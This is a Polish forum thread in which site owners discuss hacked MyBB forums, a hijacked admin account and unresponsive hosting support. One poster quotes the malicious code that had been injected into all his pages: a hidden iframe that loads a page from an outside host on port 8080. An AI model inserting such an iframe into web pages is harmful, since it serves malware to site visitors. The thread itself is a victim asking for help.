Witam,
Nie wiem czy dobry dział ale pisze tu.
Wczoraj na moje forum włamał sie haker. Zmienił nick mojego admina, hasło, wszystko w hostingu(nie mam dostępu do xaa.pl i do FTP) i e-mail. Co robic?
Nic, byłeś głupi - dałeś komuś hasło, wszystko albo ściągnołeś jakiegoś kayllogera, jak nawet nie masz dostępu do e-maila'a to nic nie zrobisz.. Masz nauczkę.
Skontaktuj się z usługodawcą.
pisałem do adminów xaa.pl ale nic nie odpisują:/ Już bym wolał żeby usuneli całe forum i ten haker też nie maił korzyści
Podaj adres forum? On coś na nim robi, korzysta z niego, czy co?
Korzysta... Jakkieś zmiany i szpanuje jakby on je zrobił...
Ta rozmowa tutaj nie ma sensu. My nie możemy Ci pomóc. Musisz skontaktować się z usługodawcą. Swoją drogą tak to jest jak się nie dba o bezpieczeństwo.
Oj dbam, dbam.
Aktualizacje MyBB: jak tylko pojawi się nowa wersja to robie.
AntyWirus: Kaspersky Internes Secundry 2009(aktual;izacja baz danych co dziennie).
Co jeszcze potrzeba?!
Tak, dbanie dbaniem, ale na pewno podałeś komuś pasy do czegoś lub otworzyłeś jakiś plik z końcówką .exe lub jakiś inny - w czymś musiałeś popełnić błąd.
(26.06.2009, 16:43)Ziomek napisał(a): [ -> ]Korzysta... Jakkieś zmiany i szpanuje jakby on je zrobił...
tak jakby było czym szpanować...
(26.06.2009, 16:53)Ziomek napisał(a): [ -> ]Oj dbam, dbam.
Aktualizacje MyBB: jak tylko pojawi się nowa wersja to robie.
AntyWirus: Kaspersky Internes Secundry 2009(aktual;izacja baz danych co dziennie).
Co jeszcze potrzeba?!
trochę rozsądku. żaden program nie zapewni ci pełnego bezpieczeństwa. dbasz, ale widać za mało.
No to teraz masz dwa wyjścia :
1. Ponieważ xaa jest płatne to możesz to zgłosić na policje ,ponieważ jest to jako tako niszczenie mnienia powinni go zatrzymać.
2. Powiedzieć gościom z UH aby się za nim ścigneli
Kilka szczegółów o moim forum:
wersja skryptu MyBB:1.4.8
wersja bazy MySQL, Postgre: MySQL
wersja używanego PHP: 5.1.35
adres forum: tworzymy.com.pl
firma hostingowa: az.pl
spis wtyczek: brak wtyczek
Opis problemu:
Od jakiegoś czasu zauważyłem że wszystkie strony umieszczone na moim koncie hostingowym (az) są infekowane szkodliwym kodem a dokładnie tym:
<iframe src="http://q47.in:8080/index.php" width=102 height=174 style="visibility: hidden"></iframe>
Skutkuje to tym, że strona jest klasyfikowana przez Google jako "rozprzestrzeniająca niebezpieczne aplikacje" (to w przypadku stron napisanych w xhtml).
W przypadku forum najpierw ukazała mi się pusta strony więc podmieniłem główny plik index.php z paczki instalacyjnej i pomogło. Jednak próby logowania do PA kończyły się niepowodzeniem aż w końcu ukazał mi się błąd:
Parse error:... .../mybb/admin/modules/home/index.php on line 165
Co znajduje się w podanym pliku i lini kodu nie trudno się domyślić.
Znacie jakieś inne metody bronienia się przed tego typu syfem oprócz tych standardowych czyli: oczyszczeniem stron, zmianą haseł kont FTP, nie zapamiętywaniem ich w systemie, programach?
Aktualizowanie programów FTP, korzystanie z sprawdzonych antywirusow.
Używam ciągle aktualizowanej filezilli i Eset smart security a mimo to mnie to dopadło.
przede wszystkim kierować sięzdrowym rozsądkiem przy pobieraniu i uruchamianiu plików z sieci. samo nic się nie zrobi. zawsze wina leży po stronie użytkownika, który, świadomie lub nie, uruchomi zainfekowany plik.